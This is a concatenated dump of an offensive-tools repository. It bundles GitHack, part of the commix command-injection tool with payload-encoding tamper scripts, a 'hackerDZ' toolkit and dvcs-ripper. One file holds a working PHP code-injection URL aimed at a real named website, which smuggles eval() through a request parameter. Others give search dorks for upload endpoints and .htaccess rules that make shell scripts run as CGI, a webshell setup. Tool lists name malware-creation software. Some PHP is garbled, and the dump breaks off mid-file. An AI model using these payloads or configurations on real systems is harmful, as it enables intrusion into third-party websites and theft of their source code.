├── GitHack ├── lib │ ├── __init__.py │ ├── __init__.pyc │ ├── parser.pyc │ └── parser.py ├── README.md └── GitHack.py ├── commix ├── src │ ├── thirdparty │ │ ├── beautifulsoup │ │ │ └── __init__.py │ │ ├── colorama │ │ │ ├── __init__.py │ │ │ ├── initialise.py │ │ │ ├── ansi.py │ │ │ ├── win32.py │ │ │ └── winterm.py │ │ └── __init__.py │ ├── __init__.py │ ├── core │ │ ├── __init__.py │ │ ├── modules │ │ │ ├── __init__.py │ │ │ ├── shellshock │ │ │ │ └── __init__.py │ │ │ ├── dns_exfiltration │ │ │ │ └── __init__.py │ │ │ ├── icmp_exfiltration │ │ │ │ └── __init__.py │ │ │ └── modules_handler.py │ │ ├── shells │ │ │ └── __init__.py │ │ ├── tamper │ │ │ ├── __init__.py │ │ │ ├── hexencode.py │ │ │ ├── space2plus.py │ │ │ ├── base64encode.py │ │ │ ├── space2tab.py │ │ │ └── space2ifs.py │ │ ├── injections │ │ │ ├── __init__.py │ │ │ ├── blind │ │ │ │ ├── __init__.py │ │ │ │ └── techniques │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── time_based │ │ │ │ │ └── __init__.py │ │ │ ├── controller │ │ │ │ ├── __init__.py │ │ │ │ ├── parser.py │ │ │ │ └── shell_options.py │ │ │ ├── semiblind │ │ │ │ ├── __init__.py │ │ │ │ └── techniques │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── file_based │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── fb_payloads.py │ │ │ │ │ └── tempfile_based │ │ │ │ │ └── __init__.py │ │ │ └── results_based │ │ │ │ ├── __init__.py │ │ │ │ └── techniques │ │ │ │ ├── __init__.py │ │ │ │ ├── classic │ │ │ │ ├── __init__.py │ │ │ │ └── cb_payloads.py │ │ │ │ └── eval_based │ │ │ │ ├── __init__.py │ │ │ │ └── eb_payloads.py │ │ └── requests │ │ │ ├── __init__.py │ │ │ ├── proxy.py │ │ │ ├── tor.py │ │ │ ├── redirection.py │ │ │ └── authentication.py │ ├── utils │ │ ├── __init__.py │ │ ├── requirments.py │ │ ├── colors.py │ │ ├── version.py │ │ ├── simple_http_server.py │ │ ├── crawler.py │ │ ├── install.py │ │ └── logs.py │ └── txt │ │ └── usernames.txt ├── readme │ └── AUTHOR ├── .travis.yml ├── 系统命令注入漏洞自动化测试工具 – Commix_files │ └── Image.jpg └── README.md ├── 
sohaip-hackerDZ ├── tools │ ├── themes │ │ ├── README.md │ │ └── village │ ├── htaccess_prv__sh │ ├── htaccess_prvsh │ ├── phpinfo │ ├── README.md │ ├── Tools_non-git.txt │ ├── thems_icon.py │ ├── local.py │ ├── index │ ├── list.txt │ └── Download_Script.sh └── download-tools-hacking │ ├── README.md │ ├── Tools_non-git.txt │ ├── list.txt │ └── Download_Script.sh ├── webshell.sh ├── Seay-Svn源代码泄露漏洞利用工具.exe ├── README.md └── dvcs-ripper ├── rip-cvs.pl ├── README.md ├── rip-hg.pl ├── rip-svn.pl └── rip-bzr.pl /GitHack/lib/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /commix/src/thirdparty/beautifulsoup/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sohaip-hackerDZ/tools/themes/README.md: -------------------------------------------------------------------------------- 1 | README.md 2 | -------------------------------------------------------------------------------- /webshell.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Introspelliam/tools/HEAD/webshell.sh -------------------------------------------------------------------------------- /GitHack/lib/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Introspelliam/tools/HEAD/GitHack/lib/__init__.pyc -------------------------------------------------------------------------------- /GitHack/lib/parser.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Introspelliam/tools/HEAD/GitHack/lib/parser.pyc -------------------------------------------------------------------------------- /Seay-Svn源代码泄露漏洞利用工具.exe: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Introspelliam/tools/HEAD/Seay-Svn源代码泄露漏洞利用工具.exe -------------------------------------------------------------------------------- /commix/readme/AUTHOR: -------------------------------------------------------------------------------- 1 | Anastasios stasinopoulos (@ancst) 2 | 3 | PGP Key ID: 0x2D40CEBF804F5133 4 | -------------------------------------------------------------------------------- /commix/.travis.yml: -------------------------------------------------------------------------------- 1 | language: python 2 | python: 3 | - "2.6" 4 | - "2.7" 5 | script: 6 | - python -c "import commix" 7 | 8 | -------------------------------------------------------------------------------- /commix/系统命令注入漏洞自动化测试工具 – Commix_files/Image.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Introspelliam/tools/HEAD/commix/系统命令注入漏洞自动化测试工具 – Commix_files/Image.jpg -------------------------------------------------------------------------------- /sohaip-hackerDZ/tools/htaccess_prv__sh: -------------------------------------------------------------------------------- 1 | Options FollowSymLinks MultiViews Indexes ExecCGI 2 | 3 | AddType application/x-httpd-cgi .sh 4 | 5 | AddHandler cgi-script .sh 6 | AddHandler cgi-script .sh 7 | -------------------------------------------------------------------------------- /sohaip-hackerDZ/tools/htaccess_prvsh: -------------------------------------------------------------------------------- 1 | Options FollowSymLinks MultiViews Indexes ExecCGI 2 | 3 | AddType application/x-httpd-cgi .sh 4 | 5 | AddHandler cgi-script .sh 6 | AddHandler cgi-script .sh 7 | -------------------------------------------------------------------------------- /sohaip-hackerDZ/tools/phpinfo: -------------------------------------------------------------------------------- 1 | 
http://cosfun.net/core//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=phpinfo(); 2 | Index of /plugins/jbimages 3 | inurl:/plupload/upload.php 4 | -------------------------------------------------------------------------------- /sohaip-hackerDZ/download-tools-hacking/README.md: -------------------------------------------------------------------------------- 1 | # Git_Pentesting_Toolkit 2 | Exploit pack for pentesters and ethical hackers. 3 | **Git required to use installer bash script.** 4 | **Linux preferred** 5 | 6 |

Current number of tools : 196

7 | 8 | 9 | -------------------------------------------------------------------------------- /commix/src/thirdparty/colorama/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. 3 | from .initialise import init, deinit, reinit 4 | from .ansi import Fore, Back, Style, Cursor 5 | from .ansitowin32 import AnsiToWin32 6 | 7 | __version__ = '0.3.3' 8 | -------------------------------------------------------------------------------- /sohaip-hackerDZ/tools/README.md: -------------------------------------------------------------------------------- 1 | # Git_Pentesting_Toolkit 2 | Exploit pack for pentesters and ethical hackers. 3 | **Git required to use installer bash script.** 4 | **Linux preferred** 5 | 6 |

Current number of tools : 196

7 | 8 | [![asciicast](https://asciinema.org/a/a4lud558ectt3bjur83ey5em2.png)](https://asciinema.org/a/a4lud558ectt3bjur83ey5em2?autoplay=1) 9 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 工具说明 2 | 3 | ## sohaip-hackerDZ 4 | 这是一位工具开发能力很强的黑客,其使用了perl语言开发了一个较为通用的cgi_rce的脚本 5 | 其中download-tools-hacking是转为渗透测试者或者白帽子准备的工具清单以及下载脚本 6 | tools是准备的工具 7 | 8 | ## commix 9 | commix是一个rce的常用工具,但是由于设计上的缺陷,这个工具使用时会感觉不太友好 10 | 11 | ## Seay-svn 12 | 这是一个专门针对svn泄露的工具,可以通过该工具对网站所在的地址上的文件下载和阅读 13 | 14 | ## GitHack 15 | 这是一个专门针对git泄露的工具,可以通过该工具对网站所在的地址上的文件进行下载 16 | 17 | ## dvcs-ripper 18 | 这是一款用Perl语言实现的支持git/svn/cvs泄露的工具 -------------------------------------------------------------------------------- /commix/src/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 
7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/utils/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/modules/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 
14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/shells/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/tamper/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/thirdparty/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 
7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/injections/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/requests/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 
14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/injections/blind/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/injections/controller/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/injections/semiblind/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 
7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/modules/shellshock/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/injections/blind/techniques/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 
14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/injections/results_based/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/modules/dns_exfiltration/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/modules/icmp_exfiltration/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 
7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/injections/semiblind/techniques/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/injections/results_based/techniques/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 
14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/injections/blind/techniques/time_based/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/injections/semiblind/techniques/file_based/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/injections/results_based/techniques/classic/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 
6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/injections/results_based/techniques/eval_based/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /commix/src/core/injections/semiblind/techniques/tempfile_based/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 
14 | """ 15 | 16 | pass -------------------------------------------------------------------------------- /sohaip-hackerDZ/tools/themes/village: -------------------------------------------------------------------------------- 1 | Colly Sehat :v 4 |
5 | Target : 6 |
7 | Postname : 8 |
9 | 10 |
'; 11 | if(!empty($_GET[tar]) AND !empty($_GET[psn])){ 12 | $target = $_GET[tar]; 13 | $spc = array('<', '>', '&'); 14 | $spv = array('<', '>', '&'); 15 | $postname = str_replace($spc, $spv, $_GET[psn]); 16 | echo '
17 |
18 | 19 |
'; 20 | }else{ 21 | echo ''; 22 | } 23 | ?> 24 | -------------------------------------------------------------------------------- /commix/src/core/tamper/hexencode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | import urllib 17 | from src.utils import settings 18 | 19 | """ 20 | Hex all characters in a given payload. 21 | """ 22 | 23 | if not settings.TAMPER_SCRIPTS['hexencode']: 24 | settings.TAMPER_SCRIPTS['hexencode'] = True 25 | 26 | def encode(payload): 27 | payload = urllib.unquote(payload) 28 | payload = payload.encode("hex") 29 | return payload 30 | 31 | #eof -------------------------------------------------------------------------------- /commix/src/core/tamper/space2plus.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 
14 | """ 15 | 16 | from src.utils import settings 17 | 18 | """ 19 | Replaces space character (' ') with plus ('+') 20 | Notes: 21 | * This tamper script works against all targets. 22 | """ 23 | 24 | settings.TAMPER_SCRIPTS['space2plus'] = True 25 | if settings.WHITESPACE[0] == "%20" or settings.WHITESPACE[0] == " ": 26 | settings.WHITESPACE[0] = "+" 27 | else: 28 | settings.WHITESPACE.append("+") 29 | 30 | #eof -------------------------------------------------------------------------------- /GitHack/README.md: -------------------------------------------------------------------------------- 1 | GitHack 2 | = 3 | 4 | GitHack is a `.git` folder disclosure exploit. 5 | 6 | It rebuilds source code from the .git folder while keeping the directory structure unchanged. 7 | 8 | GitHack是一个.git泄露利用脚本,通过泄露的.git文件夹下的文件,重建还原工程源代码。 9 | 10 | 渗透测试人员、攻击者,可以进一步审计代码,挖掘:文件上传,SQL注射等安全漏洞。 11 | 12 | ## 脚本的工作原理 ## 13 | 14 | * 解析.git/index文件,找到工程中所有的: ( 文件名,文件sha1 ) 15 | * 去.git/objects/ 文件夹下下载对应的文件 16 | * zlib解压文件,按原始的目录结构写入源代码 17 | 18 | ## 它的优点 ## 19 | 20 | * 速度快,默认20个工作线程 21 | * 尽量还原所有的源代码,缺失部分文件不影响脚本工作 22 | * 脚本不需要执行额外的git命令,All you need is python 23 | * 脚本无需浏览目录 24 | 25 | ## 可能的改进 ## 26 | 27 | * 存在文件被gc打包到git\objects\pack的情况,稍后可测试下看能否直接获取并解压这个文件,还原源代码 28 | 29 | ## 用法示例 ## 30 | GitHack.py http://www.openssl.org/.git/ 31 | 32 | ## 反馈 ## 33 | * my[at]lijiejie.com 34 | * [http://www.lijiejie.com](http://www.lijiejie.com) 35 | 36 | ## Thanks ## 37 | Thanks to sbp for his great work; I used his .git index parser [gin - a Git index file parser](https://github.com/sbp/gin) 38 | 39 | -------------------------------------------------------------------------------- /commix/src/core/tamper/base64encode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst).
7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | import base64 17 | import urllib 18 | from src.utils import settings 19 | 20 | """ 21 | Base64 all characters in a given payload. 22 | """ 23 | 24 | if not settings.TAMPER_SCRIPTS['base64encode']: 25 | settings.TAMPER_SCRIPTS['base64encode'] = True 26 | 27 | def encode(payload): 28 | payload = urllib.unquote(payload) 29 | payload = base64.b64encode(payload) 30 | return payload 31 | 32 | #eof -------------------------------------------------------------------------------- /commix/src/core/tamper/space2tab.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | from src.utils import settings 17 | 18 | """ 19 | Replaces space character (' ') with tab ('%09') 20 | Notes: 21 | * This tamper script works against all targets.
22 | """ 23 | 24 | settings.TAMPER_SCRIPTS['space2tab'] = True 25 | if settings.WHITESPACE[0] == "%20" or settings.WHITESPACE[0] == " ": 26 | settings.WHITESPACE[0] = "%09" 27 | else: 28 | settings.WHITESPACE.append("%09") 29 | 30 | #eof -------------------------------------------------------------------------------- /sohaip-hackerDZ/tools/Tools_non-git.txt: -------------------------------------------------------------------------------- 1 | These are tools which aren't obtainable with Git. 2 | You'll have to download these manually. :( 3 | I'll also include what I believe the tools would be categorized under in case you decide to sort them. 4 | 5 | --Cracking-- 6 | https://labs.portcullis.co.uk/download/acccheck-0-2-1.tar.gz 7 | --Malware_Creation-- 8 | https://www.shellterproject.com/download/ 9 | --Reverse_Engineering-- 10 | http://flasm.sourceforge.net 11 | http://www.aspectsecurity.com/tools/javasnoop 12 | http://malzilla.sourceforge.net/ 13 | --Stress_Testing-- 14 | https://sourceforge.net/projects/t50/ 15 | --Other-- 16 | http://www.dosbox.com/download.php?main=1 17 | https://www.paterva.com/web7/buy/maltego-clients/maltego-ce.php 18 | --Web_Server_Exploitation-- 19 | https://code.google.com/archive/p/cms-explorer/downloads 20 | http://blindelephant.sourceforge.net/ 21 | --Wireless_Exploitation-- 22 | http://www.willhackforsushi.com/code/cowpatty/4.6/cowpatty-4.6.tgz 23 | -------------------------------------------------------------------------------- /sohaip-hackerDZ/download-tools-hacking/Tools_non-git.txt: -------------------------------------------------------------------------------- 1 | These are tools which aren't obtainable with Git. 2 | You'll have to download these manually. :( 3 | I'll also include what I believe the tools would be categorized under in case you decide to sort them.
4 | 5 | --Cracking-- 6 | https://labs.portcullis.co.uk/download/acccheck-0-2-1.tar.gz 7 | --Malware_Creation-- 8 | https://www.shellterproject.com/download/ 9 | --Reverse_Engineering-- 10 | http://flasm.sourceforge.net 11 | http://www.aspectsecurity.com/tools/javasnoop 12 | http://malzilla.sourceforge.net/ 13 | --Stress_Testing-- 14 | https://sourceforge.net/projects/t50/ 15 | --Other-- 16 | http://www.dosbox.com/download.php?main=1 17 | https://www.paterva.com/web7/buy/maltego-clients/maltego-ce.php 18 | --Web_Server_Exploitation-- 19 | https://code.google.com/archive/p/cms-explorer/downloads 20 | http://blindelephant.sourceforge.net/ 21 | --Wireless_Exploitation-- 22 | http://www.willhackforsushi.com/code/cowpatty/4.6/cowpatty-4.6.tgz 23 | -------------------------------------------------------------------------------- /commix/src/utils/requirments.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | import os 16 | import subprocess 17 | 18 | """ 19 | Check for requirments. 20 | """ 21 | def do_check(requirment): 22 | try: 23 | # Pipe output to the file path of the null device, for silence. 
